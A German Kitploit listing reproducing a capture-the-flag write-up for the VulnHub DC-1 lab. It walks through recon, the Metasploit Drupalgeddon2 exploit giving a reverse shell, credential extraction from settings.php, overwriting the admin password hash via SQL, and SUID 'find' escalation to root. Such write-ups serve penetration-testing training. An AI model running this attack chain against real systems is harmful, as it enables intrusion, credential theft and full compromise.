Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
VulnHub-DC1-Writeup — VulnHub DC-1 Boot-to-Root — Ausnutzung von CVE-2018-7600 (Drupalgeddon2) für RCE, Extrahieren von DB-Anmeldedaten aus settings.php, Fälschen des Admin-Passwort-Hashes und Ausweiten auf Root über SUID find. | Kitploit
Tools/GitHubGitHub/prapul1/vulnhub-dc1-writeup
Privilege EscalationAufklärungExploit-FrameworksPort-ScanningSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationCTFPenetrationstestsFehlkonfigurationLernen & Bildung
122vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubprapul1/vulnhub-dc1-writeup

VulnHub-DC1-Writeup

VulnHub DC-1 Boot-to-Root — Ausnutzung von CVE-2018-7600 (Drupalgeddon2) für RCE, Extrahieren von DB-Anmeldedaten aus settings.php, Fälschen des Admin-Passwort-Hashes und Ausweiten auf Root über SUID find.

Repository anzeigen

VulnHub-DC1-Writeup

"Penetration testing lab writeups documenting full attack chains — from recon to root."

🔓 VulnHub — DC-1 Boot-to-Root Writeup

Schwierigkeit: Anfänger–Mittel
Plattform: VulnHub
Ziel: Alle 4 Flags erbeuten und vollständige Root-Kompromittierung erreichen
Angreifer-OS: Kali Linux (VirtualBox — NAT-Netzwerk)
Ziel-OS: Debian Linux (Drupal 7 CMS)


📌 Inhaltsverzeichnis

  1. Lab-Einrichtung
  2. Aufklärung & Enumeration
  3. Exploitation — Remote Code Execution
  4. Post-Exploitation — Shell-Stabilisierung
  5. Flag 1 — Webserver-Enumeration
  6. Flag 2 — Extraktion von Datenbank-Zugangsdaten
  7. Flag 3 — Admin-Panel-Zugriff per Hash-Manipulation
  8. Flag 4 & Root — SUID-Privilegieneskalation
  9. Zusammenfassung der Fähigkeiten & Tools
  10. Wichtige Erkenntnisse

🛠 Lab-Einrichtung

KomponenteDetails
HypervisorVirtualBox
NetzwerkmodusNAT-Netzwerk (beide VMs im selben Subnetz)
Angreifer-MaschineKali Linux
Ziel-MaschineDC-1 (VulnHub)
Ziel-IP10.0.2.3 (per arp-scan entdeckt)

Beide virtuellen Maschinen wurden unter demselben NAT-Netzwerk in VirtualBox konfiguriert, um die Kommunikation zwischen den VMs zu ermöglichen und gleichzeitig eine isolierte Laborumgebung zu gewährleisten.


🔍 Aufklärung & Enumeration

Host-Erkennung

Verwendet arp-scan, um alle aktiven Hosts im lokalen Subnetz zu identifizieren:

sudo arp-scan -l

Ergebnis: Ziel unter 10.0.2.3 identifiziert

Dienst- & Port-Scan

Einen vollständigen Nmap-Scan mit Versionserkennung und Standard-Skripten ausgeführt:

sudo nmap -sV -sC 10.0.2.3

Wichtigste Erkenntnisse:

PortDienstVersion
22/tcpSSHOpenSSH 6.0p1
80/tcpHTTPApache 2.2.22
111/tcprpcbind—

🔑 Kritisch: Nmap hat die Webanwendung über HTTP-Generator-Header eindeutig als Drupal 7 identifiziert — was eine bekannte verwundbare CMS-Version bestätigt.


💥 Exploitation — Remote Code Execution

Schwachstelle: Drupalgeddon2 (CVE-2018-7600)

Drupal 7 ist von einer kritischen Remote-Code-Execution-Schwachstelle (RCE) in seiner Form-API betroffen. Ein nicht authentifizierter Angreifer kann eine manipulierte HTTP-Anfrage senden, die das Backend als Systembefehl ausführt — ohne dass eine Authentifizierung erforderlich ist.

Metasploit-Framework gestartet:

msfconsole
search drupalgeddon
use exploit/multi/http/drupal_drupageddon2
set RHOSTS 10.0.2.3
exploit

Ergebnis: Meterpreter-Reverse-Shell erfolgreich als www-data (der Prozessbenutzer des Webservers) geöffnet.


🐚 Post-Exploitation — Shell-Stabilisierung

Von Meterpreter in eine native Linux-Shell gewechselt und diese mit Python-PTY stabilisiert:

shell
python -c 'import pty; pty.spawn("/bin/bash")'

Ergebnis: Voll interaktive Bash-Shell als www-data@DC-1 innerhalb von /var/www


🚩 Flag 1 — Webserver-Enumeration

ls -la /var/www
cat flag1.txt

Inhalt von Flag 1:

Jedes gute CMS braucht eine Konfigurationsdatei - und du auch.

💡 Hinweis: Verweist direkt auf die Drupal-Konfigurationsdatei — settings.php


🚩 Flag 2 — Extraktion von Datenbank-Zugangsdaten

In das Drupal-Konfigurationsverzeichnis gewechselt und die Settings-Datei untersucht:

cd /var/www/sites/default
cat settings.php

Zugangsdaten entdeckt, die im $databases-Array eingebettet sind:

FeldWert
Datenbankdrupaldb
Benutzernamedbuser
PasswortR0ck3t

Inhalt von Flag 2 (aus Dateikommentaren):

Brute-Force- und Wörterbuchangriffe sind nicht die einzigen Wege, um Zugriff
zu erlangen (und du WIRST Zugriff brauchen). Was kannst du mit diesen Zugangsdaten anfangen?

💡 Hinweis: Verwende die Zugangsdaten, um auf das MySQL-Backend zuzugreifen — ohne irgendetwas zu brute-forcen.


🚩 Flag 3 — Admin-Panel-Zugriff per Hash-Manipulation

Schritt 1: Datenbank-Enumeration

mysql -u dbuser -pR0ck3t
use drupaldb;
select uid, name, pass from users;

Gehashte Passwörter für admin und fred gefunden — beide verwenden Drupals $S$-Hashverfahren (basiert auf SHA-512).

Schritt 2: Eigenen Passwort-Hash erzeugen

Anstatt den vorhandenen Hash zu knacken, wurde Drupals eigenes eingebautes PHP-Skript verwendet, um einen neuen zu generieren:

cd /var/www
php scripts/password-hash.sh password123

Ausgabe: Ein gültiger $S$D...-Hash für password123

Schritt 3: Admin-Passwort per SQL überschreiben

use drupaldb;
update users set pass='$S$DUxDdAfJe08Z9viU5Tly0uUZXFThRFMpeBwz4T07HB6Rj0Fm2JTp' where name='admin';

Erfolgreich unter http://10.0.2.3 als admin / password123 angemeldet.

Inhalt von Flag 3 (im Drupal-Admin-Inhaltsbereich gefunden):

Spezielle PERMS helfen dir, die passwd zu FINDEN - aber du musst diesen
Befehl mit -exec ausführen, um herauszufinden, wie du an das kommst, was in der shadow steht.

💡 Hinweis: Fehlkonfiguration des SUID-Binaries find — Vektor für Privilegieneskalation identifiziert.


🚩 Flag 4 & Root — SUID-Privilegieneskalation

Schritt 1: Systembenutzer enumerieren

cat /etc/passwd

Benutzer flag4 mit Home-Verzeichnis unter /home/flag4 gefunden.

cat /home/flag4/flag4.txt

Inhalt von Flag 4:

Kannst du dieselbe Methode nutzen, um die Flag in Root zu finden oder darauf
zuzugreifen? Wahrscheinlich. Aber vielleicht ist es nicht so einfach. Oder vielleicht doch?

Schritt 2: SUID-Ausnutzung über find

Das find-Binary hatte das SUID-Bit gesetzt, was bedeutet, dass es mit den Rechten des Dateibesitzers (root) ausgeführt wird, unabhängig davon, wer es ausführt.

find . -exec /bin/sh \;
whoami
# root

Schritt 3: Root-Flag

cd /root
cat thefinalflag.txt
Gut gemacht!!! Ich hoffe, DC-1 hat dir Spaß gemacht!

Vollständige Root-Kompromittierung erreicht. ✅


🛠 Zusammenfassung der Fähigkeiten & Tools

Verwendete Tools

ToolZweck
arp-scanHost-Erkennung im lokalen Subnetz
nmapPort-Scan & Dienst-Fingerprinting
Metasploit FrameworkCVE-2018-7600-Exploit-Auslieferung & Reverse-Shell
MySQL CLIDatenbank-Enumeration & Manipulation von Zugangsdaten
PHP (password-hash.sh)Native Drupal-Hash-Generierung
Python PTYShell-Stabilisierung
VirtualBoxEinrichtung einer isolierten Laborumgebung

Demonstrierte Fähigkeiten

  • ✅ Netzwerk-Aufklärung & Host-Erkennung
  • ✅ Dienst-Fingerprinting & CMS-Identifizierung
  • ✅ CVE-Recherche & Nutzung öffentlicher Exploits
  • ✅ Metasploit-Framework — Payload-Bereitstellung
  • ✅ Post-Exploitation & Lateral Movement
  • ✅ Datenbank-Enumeration & Extraktion von Zugangsdaten
  • ✅ Passwort-Hash-Fälschung & SQL-Injection über CLI
  • ✅ Audit von Linux-SUID-Binaries
  • ✅ Privilegieneskalation zu Root

📚 Wichtige Erkenntnisse

Aus offensiver Perspektive:

  • Nicht gepatchte CMS-Plattformen (selbst 1–2 Hauptversionen veraltet) lassen sich über öffentliche CVEs und Metasploit-Module trivial ausnutzen.
  • Konfigurationsdateien wie settings.php enthalten häufig Klartext-Zugangsdaten, die einem Angreifer den Wechsel von Webzugriff zu vollständiger Datenbankkontrolle ermöglichen.
  • SUID-Fehlkonfigurationen bei gängigen Binaries wie find, vim oder python sind einer der zuverlässigsten Vektoren für Privilegieneskalation in Linux-Umgebungen.
Tool herunterladen